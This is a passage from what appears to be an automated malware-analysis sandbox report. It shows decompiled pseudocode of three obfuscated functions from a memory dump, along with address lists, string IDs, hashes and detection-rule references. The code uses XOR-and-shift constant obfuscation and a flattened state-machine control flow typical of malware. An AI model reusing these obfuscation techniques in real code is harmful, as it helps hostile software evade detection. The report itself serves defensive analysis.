				_push(_a8);
				_t353 = __ecx;
				_push(_t327);
				_push(__edx);
				_push(__ecx);
				E100167B8(_t287);
				_v20 = 0x368dc2;
				_t351 = 0;
				_v16 = 0x157bbd;
				_t364 = _t363 + 0x10;
				_v12 = 0;
				_v8 = 0;
				_t329 = 0xdd2af96;
				_v100 = 0x15d007;
				_t354 = 0x71;
				_v100 = _v100 * 0x23;
				_v100 = _v100 >> 4;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x0000bedd;
				_v36 = 0x5eb016;
				_v36 = _v36 + 0xfffff119;
				_v36 = _v36 ^ 0x005ea12e;
				_v72 = 0x418c81;
				_v72 = _v72 >> 7;
				_v72 = _v72 ^ 0xeda7a3be;
				_v72 = _v72 ^ 0xeda720a7;
				_v140 = 0x361635;
				_v140 = _v140 / _t354;
				_v140 = _v140 + 0xffff12ed;
				_v140 = _v140 | 0xcba0094a;
				_v140 = _v140 ^ 0xffff8d7f;
				_v136 = 0x9d141f;
				_v136 = _v136 + 0xffff7da9;
				_t355 = 0x47;
				_v136 = _v136 / _t355;
				_v136 = _v136 + 0xffffe6e0;
				_v136 = _v136 ^ 0x00021b68;
				_v64 = 0x81c3f6;
				_v64 = _v64 << 2;
				_v64 = _v64 ^ 0x02070fd8;
				_v48 = 0xbec282;
				_v48 = _v48 >> 5;
				_v48 = _v48 ^ 0x0005f614;
				_v144 = 0x716f2e;
				_v144 = _v144 << 0xa;
				_t356 = 0x21;
				_v144 = _v144 * 0x57;
				_v144 = _v144 / _t356;
				_v144 = _v144 ^ 0x01850567;
				_v108 = 0xe873df;
				_v108 = _v108 >> 0xc;
				_t357 = 0x28;
				_v108 = _v108 / _t357;
				_v108 = _v108 * 0x67;
				_v108 = _v108 ^ 0x000b82a3;
				_v52 = 0x278938;
				_v52 = _v52 ^ 0x47fbdade;
				_v52 = _v52 ^ 0x47d7ffa1;
				_v124 = 0x20c5c5;
				_t358 = 0x21;
				_v124 = _v124 * 0x6a;
				_v124 = _v124 | 0xf3b0fff7;
				_v124 = _v124 ^ 0xffb45b34;
				_v80 = 0x9da7bc;
				_v80 = _v80 / _t358;
				_v80 = _v80 >> 7;
				_v80 = _v80 ^ 0x000e1d35;
				_v132 = 0xa189e3;
				_v132 = _v132 >> 4;
				_v132 = _v132 ^ 0x9474e2f5;
				_v132 = _v132 + 0xffffe40c;
				_v132 = _v132 ^ 0x947da53c;
				_v116 = 0xbc5c3c;
				_v116 = _v116 >> 0xd;
				_v116 = _v116 + 0x8e9a;
				_v116 = _v116 ^ 0x51e27d26;
				_v116 = _v116 ^ 0x51eff0cf;
				_v128 = 0x8951c6;
				_v128 = _v128 | 0xff736df5;
				_v128 = _v128 + 0xffff91ae;
				_v128 = _v128 ^ 0xfffe0b86;
				_v32 = 0x745c2e;
				_v32 = _v32 >> 0xe;
				_v32 = _v32 ^ 0x000ab761;
				_v88 = 0x8e122;
				_v88 = _v88 << 5;
				_v88 = _v88 << 6;
				_v88 = _v88 ^ 0x47048bf3;
				_v92 = 0x226c9f;
				_v92 = _v92 >> 0xa;
				_v92 = _v92 << 4;
				_v92 = _v92 ^ 0x00020b00;
				_v56 = 0xf60a06;
				_v56 = _v56 + 0xffff7a7b;
				_v56 = _v56 ^ 0x00fc78a8;
				_v112 = 0x5c7e3b;
				_v112 = _v112 | 0x04f95f1e;
				_v112 = _v112 << 9;
				_t359 = 0x12;
				_v112 = _v112 / _t359;
				_v112 = _v112 ^ 0x0df02e1a;
				_v60 = 0x663705;
				_t360 = 0x50;
				_v60 = _v60 / _t360;
				_v60 = _v60 ^ 0x0000eba2;
				_v44 = 0xd637b2;
				_v44 = _v44 << 2;
				_v44 = _v44 ^ 0x03566a50;
				_v120 = 0xd3c748;
				_v120 = _v120 | 0x427f07dc;
				_t361 = 0x41;
				_v120 = _v120 * 0x75;
				_v120 = _v120 + 0xffff4801;
				_v120 = _v120 ^ 0x9ee392a4;
				_v76 = 0x93e458;
				_v76 = _v76 | 0xd9baa5af;
				_v76 = _v76 >> 2;
				_v76 = _v76 ^ 0x3669dc10;
				_v84 = 0x63d397;
				_v84 = _v84 / _t361;
				_v84 = _v84 | 0xd585c4a7;
				_v84 = _v84 ^ 0xd58a5696;
				_v96 = 0x678f57;
				_v96 = _v96 | 0x609ae501;
				_v96 = _v96 * 0x11;
				_v96 = _v96 | 0x101fd621;
				_v96 = _v96 ^ 0x70f4e646;
				_v104 = 0xcfd50;
				_v104 = _v104 * 0x42;
				_v104 = _v104 << 6;
				_v104 = _v104 ^ 0xb67254b2;
				_v104 = _v104 ^ 0x602b0959;
				_v68 = 0xcdee5a;
				_v68 = _v68 << 9;
				_v68 = _v68 ^ 0x5e559765;
				_v68 = _v68 ^ 0xc583863d;
				_v40 = 0x4f7cd4;
				_v40 = _v40 << 1;
				_v40 = _v40 ^ 0x009f3af1;
				do {
					while(_t329 != 0xe76e57) {
						if(_t329 == 0x3b12e40) {
							_t315 = E100064F4(_v56, _v112,  *((intOrPtr*)(_t353 + 4)), _v60, _v44,  *_t353, _v36, _v28, _t329, _v24, _v120,  *((intOrPtr*)( *0x10025218)), _v76, _v84, _v64,  &_v24);
							_t364 = _t364 + 0x3c;
							if(_t315 == _v48) {
								 *_t327 = _v28;
								_t351 = 1;
								 *((intOrPtr*)(_t327 + 4)) = _v24;
							} else {
								_t329 = 0xe76e57;
								continue;
							}
						} else {
							if(_t329 == 0x43ac81f) {
								_push(_t329);
								_t323 = E100134E7(_t329, _v24);
								_t364 = _t364 + 0xc;
								_v28 = _t323;
								if(_t323 != 0) {
									_t329 = 0x3b12e40;
									continue;
								}
							} else {
								if(_t329 == 0x922e583) {
									_t326 = E100064F4(_v144, _v108,  *((intOrPtr*)(_t353 + 4)), _v52, _v124,  *_t353, _v100, _t351, _t329, _v72, _v80,  *((intOrPtr*)( *0x10025218)), _v132, _v116, _v140,  &_v24);
									_t364 = _t364 + 0x3c;
									if(_t326 == _v136) {
										_t329 = 0x43ac81f;
										continue;
									}
								} else {
									if(_t329 != 0xdd2af96) {
										goto L14;
									} else {
										_t329 = 0x922e583;
										continue;
									}
								}
							}
						}
						L17:
						return _t351;
					}
					E100088FC(_v96, _v104, _v68, _v40, _v28);
					_t364 = _t364 + 0xc;
					_t329 = 0xf376108;
					L14:
				} while (_t329 != 0xf376108);
				goto L17;
			}

0x10016ad1
0x10016adb
0x10016ae2
0x10016ae4
0x10016ae5
0x10016ae6
0x10016ae7
0x10016aec
0x10016af7
0x10016af9
0x10016b04
0x10016b07
0x10016b10
0x10016b17
0x10016b1c
0x10016b2b
0x10016b2e
0x10016b32
0x10016b37
0x10016b3c
0x10016b44
0x10016b4f
0x10016b5a
0x10016b65
0x10016b6d
0x10016b72
0x10016b7a
0x10016b82
0x10016b92
0x10016b96
0x10016b9e
0x10016ba6
0x10016bae
0x10016bb6
0x10016bc2
0x10016bc7
0x10016bcd
0x10016bd5
0x10016bdd
0x10016be5
0x10016bea
0x10016bf2
0x10016bfa
0x10016bff
0x10016c07
0x10016c0f
0x10016c19
0x10016c1c
0x10016c28
0x10016c2c
0x10016c34
0x10016c3c
0x10016c45
0x10016c48
0x10016c51
0x10016c55
0x10016c5d
0x10016c65
0x10016c6d
0x10016c77
0x10016c86
0x10016c89
0x10016c8d
0x10016c95
0x10016c9d
0x10016cad
0x10016cb1
0x10016cb6
0x10016cbe
0x10016cc6
0x10016ccb
0x10016cd3
0x10016cdb
0x10016ce3
0x10016ceb
0x10016cf0
0x10016cf8
0x10016d00
0x10016d08
0x10016d10
0x10016d18
0x10016d20
0x10016d28
0x10016d33
0x10016d3b
0x10016d46
0x10016d4e
0x10016d53
0x10016d58
0x10016d60
0x10016d68
0x10016d6d
0x10016d72
0x10016d7a
0x10016d82
0x10016d8a
0x10016d92
0x10016d9a
0x10016da2
0x10016dab
0x10016db0
0x10016db6
0x10016dbe
0x10016dca
0x10016dcf
0x10016dd5
0x10016ddd
0x10016de5
0x10016dea
0x10016df2
0x10016dfa
0x10016e07
0x10016e08
0x10016e0c
0x10016e14
0x10016e1c
0x10016e24
0x10016e2c
0x10016e31
0x10016e39
0x10016e47
0x10016e4b
0x10016e58
0x10016e60
0x10016e68
0x10016e75
0x10016e79
0x10016e81
0x10016e89
0x10016e96
0x10016e9a
0x10016e9f
0x10016ea7
0x10016eaf
0x10016eb7
0x10016ebc
0x10016ec4
0x10016ecc
0x10016ed4
0x10016ed8
0x10016ee0
0x10016ee0
0x10016eee
0x10017004
0x10017009
0x10017010
0x10017057
0x10017059
0x10017061
0x10017012
0x10017012
0x00000000
0x10017012
0x10016ef4
0x10016efa
0x10016f87
0x10016f90
0x10016f95
0x10016f98
0x10016fa1
0x10016fa7
0x00000000
0x10016fa7
0x10016efc
0x10016f02
0x10016f58
0x10016f5d
0x10016f64
0x10016f6a
0x00000000
0x10016f6a
0x10016f04
0x10016f0a
0x00000000
0x10016f10
0x10016f10
0x00000000
0x10016f10
0x10016f0a
0x10016f02
0x10016efa
0x10017064
0x10017070
0x10017070
0x10017033
0x10017038
0x1001703b
0x10017040
0x10017040
0x00000000

Strings

Wn, xrefs: 10016E53
&}Q, xrefs: 10016CF8
;~\, xrefs: 10016D92
.oq, xrefs: 10016C07
Y+`, xrefs: 10016EA7
.\t, xrefs: 10016D28

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: &}Q$.\t$.oq$;~\$Wn$Y+`
API String ID: 0-2117422322
Opcode ID: 4b8c236517f8e122a77eb3ba793cd821743b3aeeb2d176507afa5c55d8d8559b
Instruction ID: 9b87224590faa9de5dad24fc2c2c53541f0b44f6fc4a4481d7728f8b991a42ec
Opcode Fuzzy Hash: 4b8c236517f8e122a77eb3ba793cd821743b3aeeb2d176507afa5c55d8d8559b
Instruction Fuzzy Hash: 3DE1EE725087809FD765CF61C889A1BFBE1FBC8748F50891DF6998A260D7B28589DF03

Uniqueness

Uniqueness Score: -1.00%

Function 10021FA6, Relevance: 7.8, Strings: 6, Instructions: 259
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E10021FA6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16) {
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				void* _t253;
				intOrPtr _t276;
				void* _t281;
				void* _t286;
				intOrPtr* _t287;
				void* _t289;
				void* _t304;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				void* _t311;
				void* _t312;

				_t287 = _a8;
				_t306 = _a16;
				_push(_a16);
				_push(_a12);
				_push(_t287);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100167B8(_t253);
				_v20 = 0x1d063d;
				_t312 = _t311 + 0x18;
				asm("stosd");
				_t289 = 0x4f35e0;
				asm("stosd");
				_t307 = 0x31;
				asm("stosd");
				_v44 = 0xf389cb;
				_t304 = 0;
				_v44 = _v44 * 0x3e;
				_v44 = _v44 ^ 0x3afb5f2b;
				_v32 = 0x6d3f6b;
				_t13 =  &_v32; // 0x6d3f6b
				_v32 =  *_t13 * 0x7e;
				_v32 = _v32 ^ 0x35c536ab;
				_v128 = 0x2fe326;
				_v128 = _v128 | 0xcc5918f2;
				_v128 = _v128 + 0xffffc7e3;
				_v128 = _v128 << 0xa;
				_v128 = _v128 ^ 0xff0f6400;
				_v60 = 0x9dd05a;
				_v60 = _v60 ^ 0xa62d5697;
				_v60 = _v60 ^ 0xa6b086cd;
				_v144 = 0x4f5206;
				_v144 = _v144 >> 7;
				_v144 = _v144 + 0xffff4c37;
				_v144 = _v144 * 0xb;
				_v144 = _v144 ^ 0xffff1769;
				_v76 = 0xefd5ef;
				_v76 = _v76 << 0xb;
				_v76 = _v76 ^ 0x7eaf7800;
				_v108 = 0x212a48;
				_v108 = _v108 >> 1;
				_v108 = _v108 ^ 0xbb3219af;
				_v108 = _v108 ^ 0xbb228c8b;
				_v104 = 0xc6abba;
				_v104 = _v104 | 0x2a217e36;
				_v104 = _v104 / _t307;
				_v104 = _v104 ^ 0x00e823de;
				_v120 = 0xd2025a;
				_v120 = _v120 + 0xffffbdcf;
				_v120 = _v120 | 0x6d4eb8a3;
				_v120 = _v120 ^ 0xe1795a96;
				_v120 = _v120 ^ 0x8ca039c8;
				_v136 = 0xab32eb;
				_t308 = 0x3d;
				_v136 = _v136 / _t308;
				_v136 = _v136 * 0x78;
				_v136 = _v136 >> 0xf;
				_v136 = _v136 ^ 0x00005eda;
				_v80 = 0x2bd84c;
				_v80 = _v80 ^ 0x79954530;
				_v80 = _v80 ^ 0x79b90bd6;
				_v68 = 0x1a3ba3;
				_v68 = _v68 * 0x6f;
				_v68 = _v68 ^ 0x0b5c09bd;
				_v36 = 0x92d254;
				_v36 = _v36 ^ 0xe198c4d6;
				_v36 = _v36 ^ 0xe10f14c0;
				_v84 = 0x1fa34a;
				_v84 = _v84 >> 8;
				_v84 = _v84 | 0x4942c488;
				_v84 = _v84 ^ 0x49467cba;
				_v124 = 0xb738b6;
				_v124 = _v124 ^ 0xad31ef63;
				_v124 = _v124 ^ 0x2d5f628b;
				_v124 = _v124 | 0x1feae17c;
				_v124 = _v124 ^ 0x9ffc3f3e;
				_v100 = 0x4604b5;
				_v100 = _v100 + 0xffff5422;
				_v100 = _v100 + 0xffffae88;
				_v100 = _v100 ^ 0x00493e10;
				_v48 = 0x1c3822;
				_v48 = _v48 >> 2;
				_v48 = _v48 ^ 0x000d9978;
				_v56 = 0xa55ae7;
				_v56 = _v56 << 0xe;
				_v56 = _v56 ^ 0x56b1e018;
				_v132 = 0xb6ba8e;
				_v132 = _v132 << 0xe;
				_v132 = _v132 | 0x5526172c;
				_v132 = _v132 >> 2;
				_v132 = _v132 ^ 0x3fee9bc4;
				_v64 = 0x338543;
				_v64 = _v64 + 0x97e7;
				_v64 = _v64 ^ 0x003519bc;
				_v72 = 0x5df43d;
				_v72 = _v72 << 0xa;
				_v72 = _v72 ^ 0x77daeae9;
				_v96 = 0x3aa2e3;
				_v96 = _v96 + 0xffffa156;
				_v96 = _v96 + 0xffff7e07;
				_v96 = _v96 ^ 0x003a13bd;
				_v140 = 0xbaf567;
				_t309 = 0x7c;
				_v140 = _v140 / _t309;
				_v140 = _v140 | 0xe206a112;
				_v140 = _v140 * 0x26;
				_v140 = _v140 ^ 0x8d218f3a;
				_v88 = 0x8be2c2;
				_v88 = _v88 + 0xffff38b2;
				_v88 = _v88 | 0x0c6a7f69;
				_v88 = _v88 ^ 0x0cecad3d;
				_v52 = 0x816584;
				_v52 = _v52 >> 2;
				_v52 = _v52 ^ 0x0026addc;
				_v116 = 0x735380;
				_v116 = _v116 << 0x10;
				_v116 = _v116 * 0x73;
				_v116 = _v116 >> 2;
				_v116 = _v116 ^ 0x20a50565;
				_v40 = 0x8899b6;
				_v40 = _v40 ^ 0x38b41765;
				_v40 = _v40 ^ 0x3839fbd4;
				_v112 = 0x220db6;
				_v112 = _v112 * 0x1b;
				_v112 = _v112 ^ 0xb5c6dd74;
				_v112 = _v112 ^ 0xb6511a40;
				_v92 = 0x3c800f;
				_v92 = _v92 * 3;
				_v92 = _v92 * 0x31;
				_v92 = _v92 ^ 0x22b1def5;
				while(_t289 != 0x4f35e0) {
					if(_t289 == 0x4e08a3e) {
						_push(_t289);
						_t276 = E100134E7(_t289, _v24);
						_t312 = _t312 + 0xc;
						_v28 = _t276;
						if(_t276 != 0) {
							_t289 = 0xd56d39e;
							continue;
						}
					} else {
						if(_t289 == 0x8805798) {
							E100088FC(_v116, _v40, _v112, _v92, _v28);
						} else {
							if(_t289 == 0xd56d39e) {
								_t281 = E1001EA37(_v132,  *_t306,  *((intOrPtr*)(_t306 + 4)), _v64, _v72, _v24, _v76, _v96, _t289,  *((intOrPtr*)( *0x10025218)),  &_v24, _v140, _v28, _t289, _v88, _v52, _v32);
								_t312 = _t312 + 0x3c;
								if(_t281 == _v108) {
									 *_t287 = _v28;
									_t304 = 1;
									 *((intOrPtr*)(_t287 + 4)) = _v24;
								} else {
									_t289 = 0x8805798;
									continue;
								}
							} else {
								if(_t289 != 0xdfd4e72) {
									L13:
									if(_t289 != 0xbe4f276) {
										continue;
									} else {
									}
								} else {
									_t286 = E1001EA37(_v104,  *_t306,  *((intOrPtr*)(_t306 + 4)), _v120, _v136, _v128, _v60, _v80, _t289,  *((intOrPtr*)( *0x10025218)),  &_v24, _v68, _t304, _t289, _v36, _v84, _v44);
									_t312 = _t312 + 0x3c;
									if(_t286 == _v144) {
										_t289 = 0x4e08a3e;
										continue;
									}
								}
							}
						}
					}
					return _t304;
				}
				_t289 = 0xdfd4e72;
				goto L13;
			}

0x10021fad
0x10021fb6
0x10021fbe
0x10021fbf
0x10021fc6
0x10021fc7
0x10021fce
0x10021fcf
0x10021fd0
0x10021fd5
0x10021fe9
0x10021fec
0x10021fef
0x10021ff6
0x10021ff7
0x10021ffa
0x10021ffb
0x10022003
0x1002200a
0x1002200e
0x10022016
0x10022021
0x10022029
0x10022030
0x1002203b
0x10022043
0x1002204b
0x10022053
0x10022058
0x10022060
0x10022068
0x10022070
0x10022078
0x10022080
0x10022085
0x10022092
0x10022096
0x1002209e
0x100220a6
0x100220ab
0x100220b3
0x100220bb
0x100220bf
0x100220c7
0x100220cf
0x100220d7
0x100220e7
0x100220eb
0x100220f3
0x100220fb
0x10022103
0x1002210b
0x10022113
0x1002211b
0x10022127
0x1002212a
0x10022133
0x10022137
0x1002213c
0x10022144
0x1002214c
0x10022154
0x1002215c
0x10022169
0x1002216f
0x10022177
0x10022182
0x1002218d
0x10022198
0x100221a0
0x100221a5
0x100221ad
0x100221b5
0x100221bd
0x100221c5
0x100221cd
0x100221d5
0x100221dd
0x100221e5
0x100221ed
0x100221f5
0x100221fd
0x10022205
0x1002220a
0x10022212
0x1002221a
0x1002221f
0x10022227
0x1002222f
0x10022234
0x1002223c
0x10022241
0x10022249
0x10022251
0x10022259
0x10022261
0x10022269
0x1002226e
0x10022276
0x1002227e
0x10022286
0x1002228e
0x10022296
0x100222a4
0x100222ac
0x100222b0
0x100222bd
0x100222c1
0x100222c9
0x100222d1
0x100222d9
0x100222e1
0x100222e9
0x100222f1
0x100222f6
0x100222fe
0x10022306
0x10022310
0x10022314
0x10022319
0x10022321
0x10022329
0x10022331
0x10022339
0x10022346
0x1002234a
0x10022352
0x1002235a
0x10022367
0x10022370
0x10022374
0x1002237c
0x1002238a
0x1002248a
0x10022493
0x10022498
0x1002249b
0x100224a4
0x100224a6
0x00000000
0x100224a6
0x10022390
0x10022396
0x100224f5
0x1002239c
0x100223a2
0x10022462
0x10022467
0x1002246e
0x100224cc
0x100224ce
0x100224d6
0x10022470
0x10022470
0x00000000
0x10022470
0x100223a4
0x100223aa
0x100224b5
0x100224bb
0x00000000
0x00000000
0x100224c1
0x100223b0
0x100223f5
0x100223fa
0x10022401
0x10022407
0x00000000
0x10022407
0x10022401
0x100223aa
0x100223a2
0x10022396
0x10022509
0x10022509
0x100224b0
0x00000000

Strings

5O, xrefs: 1002237C
5O, xrefs: 10021FEF
&/, xrefs: 1002203B
6~!*, xrefs: 100220D7
H*!, xrefs: 100220B3
k?m, xrefs: 10022021

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: &/$6~!*$H*!$k?m$5O$5O
API String ID: 0-2635713013
Opcode ID: a0e2ea5fe0452080f7f04173836bc26ae00f73d79ad2c08556b1c85ac6a9fb68
Instruction ID: 7113d592a66b1641bdd7e1f8b4e9e25e382aef286adb974623d9a749ca89b543
Opcode Fuzzy Hash: a0e2ea5fe0452080f7f04173836bc26ae00f73d79ad2c08556b1c85ac6a9fb68
Instruction Fuzzy Hash: F7D1ED710083809FC768CF65C486A5BFBE1FBC9744F508A0DF69586260D7B69A49CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1000DC24, Relevance: 7.8, Strings: 6, Instructions: 255
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E1000DC24(void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				char _t264;
				void* _t292;
				void* _t296;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				intOrPtr _t326;
				signed int* _t329;

				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(0);
				_t264 = E100167B8(0);
				_v72 = _t264;
				_t329 =  &(( &_v180)[0xa]);
				_v128 = 0x1c7afb;
				_t326 = _t264;
				_v128 = _v128 + 0xde63;
				_v128 = _v128 >> 3;
				_t296 = 0xa46fca1;
				_v128 = _v128 ^ 0x0003af2b;
				_v132 = 0xfde8cd;
				_v132 = _v132 + 0xb49d;
				_v132 = _v132 | 0x9d8a74ae;
				_v132 = _v132 ^ 0x9dfefdce;
				_v148 = 0x2aa08;
				_v148 = _v148 << 1;
				_v148 = _v148 + 0xba95;
				_v148 = _v148 | 0xafaca36e;
				_v148 = _v148 ^ 0xafa5a54d;
				_v100 = 0xf0a208;
				_v100 = _v100 << 0x10;
				_v100 = _v100 ^ 0xa206a769;
				_v116 = 0x82436;
				_v116 = _v116 + 0x207b;
				_v116 = _v116 << 3;
				_v116 = _v116 ^ 0x004bf3e6;
				_v172 = 0x8ec532;
				_v172 = _v172 << 1;
				_t320 = 0x75;
				_v172 = _v172 / _t320;
				_v172 = _v172 + 0xffffdee7;
				_v172 = _v172 ^ 0x0003a285;
				_v104 = 0x509e62;
				_v104 = _v104 + 0x1ae;
				_v104 = _v104 * 3;
				_v104 = _v104 ^ 0x00f5ea05;
				_v108 = 0xb902cd;
				_v108 = _v108 ^ 0x89257cf3;
				_v108 = _v108 + 0xc8af;
				_v108 = _v108 ^ 0x8996b249;
				_v164 = 0xb6b445;
				_v164 = _v164 * 0x3a;
				_v164 = _v164 ^ 0xc0115752;
				_v164 = _v164 << 0xe;
				_v164 = _v164 ^ 0x60300090;
				_v140 = 0xb9c004;
				_v140 = _v140 + 0xffff9609;
				_v140 = _v140 * 0x2a;
				_v140 = _v140 ^ 0x1e626e76;
				_v156 = 0x45a801;
				_v156 = _v156 >> 8;
				_v156 = _v156 << 3;
				_v156 = _v156 + 0x5399;
				_v156 = _v156 ^ 0x00004e0a;
				_v124 = 0x388bca;
				_v124 = _v124 >> 6;
				_v124 = _v124 * 0x7b;
				_v124 = _v124 ^ 0x006257d5;
				_v112 = 0xf0d2f;
				_v112 = _v112 + 0xffffcbf5;
				_v112 = _v112 + 0x6816;
				_v112 = _v112 ^ 0x00037322;
				_v168 = 0x7e15f3;
				_v168 = _v168 << 7;
				_t321 = 0x77;
				_v168 = _v168 / _t321;
				_v168 = _v168 >> 9;
				_v168 = _v168 ^ 0x00088e13;
				_v176 = 0x8372e5;
				_v176 = _v176 ^ 0xcafdbf70;
				_v176 = _v176 >> 3;
				_v176 = _v176 + 0xe336;
				_v176 = _v176 ^ 0x1956774f;
				_v120 = 0xeaecfc;
				_v120 = _v120 << 7;
				_t322 = 0x3a;
				_v120 = _v120 * 0x56;
				_v120 = _v120 ^ 0x75c6a771;
				_v180 = 0xedb1c;
				_v180 = _v180 + 0x1f22;
				_v180 = _v180 + 0xffffbee3;
				_v180 = _v180 * 0x2c;
				_v180 = _v180 ^ 0x0284f0f8;
				_v76 = 0xae4849;
				_v76 = _v76 + 0xb98f;
				_v76 = _v76 ^ 0x00ac20d6;
				_v88 = 0xafe71e;
				_v88 = _v88 | 0xc4ae56e5;
				_v88 = _v88 ^ 0xc4a82f27;
				_v80 = 0x529713;
				_v80 = _v80 + 0xffff28ff;
				_v80 = _v80 ^ 0x00559eee;
				_v160 = 0x54f7df;
				_v160 = _v160 * 0x15;
				_v160 = _v160 | 0x037cbdc4;
				_v160 = _v160 << 2;
				_v160 = _v160 ^ 0x1fff9c46;
				_v92 = 0x3b9595;
				_v92 = _v92 << 3;
				_v92 = _v92 ^ 0x01d68528;
				_v96 = 0xc6b18d;
				_v96 = _v96 * 0x64;
				_v96 = _v96 ^ 0x4d94378d;
				_v136 = 0x9d6512;
				_v136 = _v136 ^ 0xbaf4b6ea;
				_v136 = _v136 ^ 0xe16c6736;
				_v136 = _v136 ^ 0x5b0bb7a8;
				_v84 = 0x7a5809;
				_v84 = _v84 | 0xabbdfc9b;
				_v84 = _v84 ^ 0xabfe32fc;
				_v144 = 0xbab1ef;
				_v144 = _v144 ^ 0x65ec1e66;
				_v144 = _v144 * 0x5d;
				_t323 = 0x74;
				_v144 = _v144 / _t322;
				_v144 = _v144 ^ 0x039dba76;
				_v152 = 0xe14d81;
				_v152 = _v152 / _t323;
				_v152 = _v152 >> 7;
				_t324 = 0x18;
				_v152 = _v152 / _t324;
				_v152 = _v152 ^ 0x000e9558;
				do {
					while(_t296 != 0x8103437) {
						if(_t296 == 0xa46fca1) {
							_t296 = 0xb5e930a;
							continue;
						} else {
							if(_t296 == 0xb5e930a) {
								_t292 = E10011642(_a24, _v148, _t296,  &_v72, _v100);
								_t329 =  &(_t329[3]);
								if(_t292 != 0) {
									_t296 = 0x8103437;
									continue;
								}
							} else {
								if(_t296 != 0xed27289) {
									goto L11;
								} else {
									E10013F3E(_v136, _v72, _v84, _v144, _v152);
								}
							}
						}
						L6:
						return _t326;
					}
					E1001A5E3(_v116,  &_v68, _v172, _v104, 0x44, _v108);
					_push(_v124);
					_v68 = 0x44;
					_push(_v156);
					_push(_v140);
					_t298 = _v164;
					_v60 = E1000416C(_v164, 0x1000126c);
					_t326 = E10013E5C(_v112, _v72, _v168, _a24, _v164, _a16, _v176,  &_v68, _v120, _v180, _t298, _t298, _a32, _v132 | _v128, 0, _t298, _v76, _v88, _v80);
					E1000B952(_v160, _v60, _v92, _v96);
					_t329 =  &(_t329[0x1a]);
					_t296 = 0xed27289;
					L11:
				} while (_t296 != 0x8aff6a0);
				goto L6;
			}

0x1000dc2e
0x1000dc37
0x1000dc3e
0x1000dc45
0x1000dc4c
0x1000dc53
0x1000dc5a
0x1000dc61
0x1000dc62
0x1000dc63
0x1000dc64
0x1000dc69
0x1000dc70
0x1000dc73
0x1000dc7b
0x1000dc7d
0x1000dc87
0x1000dc8c
0x1000dc91
0x1000dc99
0x1000dca1
0x1000dca9
0x1000dcb1
0x1000dcb9
0x1000dcc1
0x1000dcc5
0x1000dccd
0x1000dcd5
0x1000dcdd
0x1000dce5
0x1000dcea
0x1000dcf2
0x1000dcfa
0x1000dd02
0x1000dd07
0x1000dd0f
0x1000dd17
0x1000dd21
0x1000dd24
0x1000dd28
0x1000dd30
0x1000dd38
0x1000dd40
0x1000dd4d
0x1000dd51
0x1000dd59
0x1000dd61
0x1000dd69
0x1000dd71
0x1000dd79
0x1000dd86
0x1000dd8a
0x1000dd92
0x1000dd97
0x1000dd9f
0x1000dda7
0x1000ddb4
0x1000ddb8
0x1000ddc0
0x1000ddc8
0x1000ddcd
0x1000ddd2
0x1000ddda
0x1000dde2
0x1000ddea
0x1000ddf4
0x1000ddf8
0x1000de00
0x1000de08
0x1000de12
0x1000de1a
0x1000de22
0x1000de2a
0x1000de35
0x1000de3a
0x1000de40
0x1000de45
0x1000de4d
0x1000de55
0x1000de5d
0x1000de62
0x1000de6a
0x1000de72
0x1000de7a
0x1000de84
0x1000de87
0x1000de8b
0x1000de93
0x1000de9b
0x1000dea3
0x1000deb0
0x1000deb4
0x1000debc
0x1000dec4
0x1000decc
0x1000ded4
0x1000dedc
0x1000dee4
0x1000deec
0x1000def4
0x1000defc
0x1000df04
0x1000df11
0x1000df15
0x1000df1d
0x1000df22
0x1000df2a
0x1000df32
0x1000df37
0x1000df3f
0x1000df4c
0x1000df50
0x1000df58
0x1000df60
0x1000df68
0x1000df70
0x1000df78
0x1000df80
0x1000df88
0x1000df90
0x1000df98
0x1000dfa5
0x1000dfaf
0x1000dfb0
0x1000dfb6
0x1000dfbe
0x1000dfce
0x1000dfd2
0x1000dfdd
0x1000dfea
0x1000dff3
0x1000dffb
0x1000dffb
0x1000e005
0x1000e067
0x00000000
0x1000e007
0x1000e009
0x1000e057
0x1000e05c
0x1000e061
0x1000e063
0x00000000
0x1000e063
0x1000e00b
0x1000e00d
0x00000000
0x1000e013
0x1000e02a
0x1000e02f
0x1000e00d
0x1000e009
0x1000e033
0x1000e03e
0x1000e03e
0x1000e084
0x1000e089
0x1000e092
0x1000e09d
0x1000e0a1
0x1000e0a5
0x1000e0b1
0x1000e11d
0x1000e131
0x1000e136
0x1000e139
0x1000e13b
